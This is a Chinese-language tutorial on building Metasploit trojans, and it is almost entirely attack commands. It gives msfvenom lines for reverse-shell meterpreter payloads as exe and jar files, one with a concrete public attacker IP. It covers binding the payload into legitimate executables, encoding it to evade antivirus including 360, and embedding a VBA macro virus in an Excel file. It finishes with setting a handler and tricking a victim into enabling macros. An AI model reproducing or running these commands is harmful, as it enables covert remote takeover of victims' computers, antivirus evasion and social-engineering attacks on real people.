Metasploit木马 进阶

metasploit（msf）生成exe木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者ip LPORT=攻击者端口 -f exe > abc.exe

例如:msfvenom -p windows/meterpreter/reverse_tcp lhost=103.46.128.46 lport=55497 -f exe > /home/anonymous/Anon.exe

metasploit捆绑:在metasploit中木马可以捆绑其他正常的exe:

msfvenom -p windows/meterpreter_reverse_tcp LHOST={公网IP} LPORT={公网端口} -e x86/shikata_ga_nai -f exe -o /home/用户名/桌面/{文件名}.exe -i 5 -x {捆绑对象}.exe

(含义:生成木马捆绑可执行程序并以x86/shikata_ga_nai格式免杀)

metasploit（msf）生成java(jar)木马:

msfvenom -p java/meterpreter/reverse_tcp LHOST=攻击者ip LPORT=攻击者端口 W > text.jar

免杀过360版本java木马:msfvenom -p java/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=攻击者ip lport=攻击者端口 -f raw -o muma.jar

(注意:java木马捆绑java文件之后,java木马会失效)

步骤:

1、生成能反弹会话的宏病毒代码

msfconsole

use windows/meterpreter/reverse_tcp

set lhost 攻击者IP

set lport 攻击者端口

generate -f vba

2、将宏病毒植入office文件

将之前生成的宏病毒代码完整复制出来，新建一个excel文件，录制宏

编辑宏

打开左侧栏的”This Workbook”，将之前复制的宏病毒代码完整的粘贴进去，保存好

保存过程中如果有如下提示，点击“否”，另存为“.xlsm”格式(启用宏的excel文件格式)

最后生成如下文件（test.xlsm）

3、设置metasploit监听返回会话

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.8.131

set lport 8899

exploit

利用社会工程学，把此文件诱导受害者点击打开，并启用宏

成功返回一个meterpreter会话

4、总结

原始生成的宏病毒代码并不具备免杀性质，需要辅以工具来达到免杀效果；

当受害者关闭带有病毒的文件后，相应的，返回的meterpreter会话也被终止。